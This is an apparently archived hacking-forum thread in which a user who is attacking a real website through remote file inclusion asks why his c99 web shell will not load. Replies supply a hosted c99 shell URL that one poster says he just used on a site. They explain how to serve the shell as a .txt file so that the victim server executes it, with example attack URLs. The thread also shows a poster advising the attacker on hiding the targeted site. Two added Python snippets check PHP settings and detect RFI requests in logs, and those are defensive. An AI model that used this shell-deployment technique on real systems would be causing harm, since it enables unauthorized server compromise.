HellBound Hackers | Computer General | Web hacking

c99 shell scripts
Posted on 19-03-07 02:05
I found a website vulnerable to RFI and when I do index.php?page=http://www.arabian-outlaw.com/c99.txt
it doesn't work like a properly configured c99 shell.
Any help would be appreciated.

RE: c99 shell scripts
Posted on 19-03-07 02:41
The only thing I can tell you is that with PHP you can easily prevent Remote File Inclusion just by modifying a few settings in the configuration.

Otherwise, what are you expecting from us as an answer?
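
The configuration settings referred to in the reply above are, in stock PHP, `allow_url_include` and `allow_url_fopen`. The following check is an added example, not part of the original thread: it reads php.ini text and reports whether `include`/`require` would fetch remote URLs. The sample configuration and the function names are constructed for illustration.

```python
import re

# Spellings PHP accepts (case-insensitively) as boolean true in php.ini.
_TRUE = {"1", "on", "true", "yes"}

# Built-in defaults that apply when a directive is absent (PHP >= 5.2).
DEFAULTS = {"allow_url_fopen": True, "allow_url_include": False}

# Constructed sample configuration, not taken from any real server.
SAMPLE_INI = """\
[PHP]
allow_url_fopen = On
allow_url_include = On   ; remote include enabled
;allow_url_include = Off
"""

def effective_settings(ini_text):
    """Return the effective boolean value of the two audited directives."""
    values = dict(DEFAULTS)
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop ';' comments
        m = re.match(r"^([A-Za-z0-9_.]+)\s*=\s*(.*)$", line)
        if m and m.group(1).lower() in values:
            value = m.group(2).strip().strip('"').lower()
            values[m.group(1).lower()] = value in _TRUE   # last assignment wins
    return values

def remote_include_enabled(ini_text):
    """True when include/require will accept http:// or ftp:// URLs.

    allow_url_include only takes effect while allow_url_fopen is also on.
    """
    s = effective_settings(ini_text)
    return s["allow_url_include"] and s["allow_url_fopen"]

if __name__ == "__main__":
    print(effective_settings(SAMPLE_INI))
    print("remote include possible:", remote_include_enabled(SAMPLE_INI))
```

Turning the directive off only stops URL includes; an include that takes its path from a request parameter still accepts local paths and needs an allowlist of page names.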

RE: c99 shell scripts
Posted on 19-03-07 21:44
turbocharged_06 wrote:
it doesn't work like a properly configured c99 shell

That is because it isn't a c99 shell as far as I can see.
Try this one: http://b0rizq.by.ru/c99.txt?&

I just used it 5 minutes ago on a site so I'm sure it works.

Good luck!


RE: c99 shell scripts
Posted on 19-03-07 22:13
Well, try changing the extension to .php


RE: c99 shell scripts
Posted on 19-03-07 22:34
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).

The reason you need to do this is because the PHP code is being parsed on your server before being shipped to the vulnerable server, meaning you'll get a static shell instead of the actual PHP code.


RE: c99 shell scripts
Posted on 19-03-07 23:03
WhiteAcid wrote:
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).

The reason you need to do this is because the PHP code is being parsed on your server before being shipped to the vulnerable server, meaning you'll get a static shell instead of the actual PHP code.

Can you explain that one more time?
You mean I should put this
Code
http://b0rizq.by.ru/c99.txt?&

into a file like
Code
http://www.arabian-outlaw.com/c99.php

because when I did that it opened the shell on my website.

RE: c99 shell scripts
Posted on 20-03-07 19:40
Use http://b0rizq.by.ru/c99.txt in the attacks.

Here's a simpler explanation. Let's say you have a file called echo.php whose contents are:
Code
<?php echo "test"; ?>

You want to run this on vuln.com using RFI.

You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php

vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.

If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).

Does it make more sense now?
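
From the vulnerable server's side, the request pattern described above is visible in its access log as a parameter value that is itself a remote URL. The following detector is an added example, not part of the original thread: the log lines, host names and the allowlist of parameters that legitimately carry URLs are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines; addresses and hosts are documentation values.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Mar/2007:02:05:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
203.0.113.7 - - [19/Mar/2007:02:05:40 +0000] "GET /index.php?page=http://files.example/x.txt?& HTTP/1.1" 200 212
198.51.100.9 - - [19/Mar/2007:02:06:02 +0000] "GET /index.php?page=hTTp%3A%2F%2Ffiles.example%2Fx.txt HTTP/1.1" 200 212
198.51.100.9 - - [19/Mar/2007:02:07:30 +0000] "GET /out.php?url=https://example.org/ HTTP/1.1" 302 0
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Assumption: (path, parameter) pairs on this site that are meant to hold URLs.
URL_PARAMS_OK = {("/out.php", "url")}

def find_rfi_attempts(log_text, allow=URL_PARAMS_OK):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)       # second decode catches double encoding
            if REMOTE.match(value) and (path, name) not in allow:
                hits.append({
                    "client": client, "path": path, "param": name,
                    "value": value, "status": int(status),
                    # A trailing '?', as in the URL quoted in this thread,
                    # is unusual for a legitimate page name.
                    "trailing_qmark": value.endswith("?"),
                })
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```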


RE: c99 shell scripts
Posted on 20-03-07 20:21
The PHP code itself is useless. It's just plain text until the server has baked a working page out of it, which is called parsing.

Basically what Acid is saying is that if the shell is named ".php", http://b0rizq.by.ru will first parse the code and then send it to the vulnerable page. But that's not what you want! You want the vulnerable page to do the parsing, so you can access its content. In order to accomplish this the shell needs to be a filesize which the PHP parser doesn't parse before the server sends it.
That's why the shell needs to be a txt file.

I hope this explanation + Acid's great example are sufficient!

Good luck!

S-H


RE: c99 shell scripts
Posted on 20-03-07 23:34
WhiteAcid wrote:
Use http://b0rizq.by.ru/c99.txt in the attacks.

Here's a simpler explanation. Let's say you have a file called echo.php whose contents are:
Code
<?php echo "test"; ?>

You want to run this on vuln.com using RFI.

You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php

vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.

If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).

Does it make more sense now?

Yes, thank you. I have previously tried that and it does process the statement.
Here's a picture of what I mean.

I'll update.

Edited by on 21-03-07 00:07

RE: c99 shell scripts
Posted on 20-03-07 23:52
yo turbo, take that pic down if you really don't want ppl to know the site you're hacking cuz you can still tell by that pic.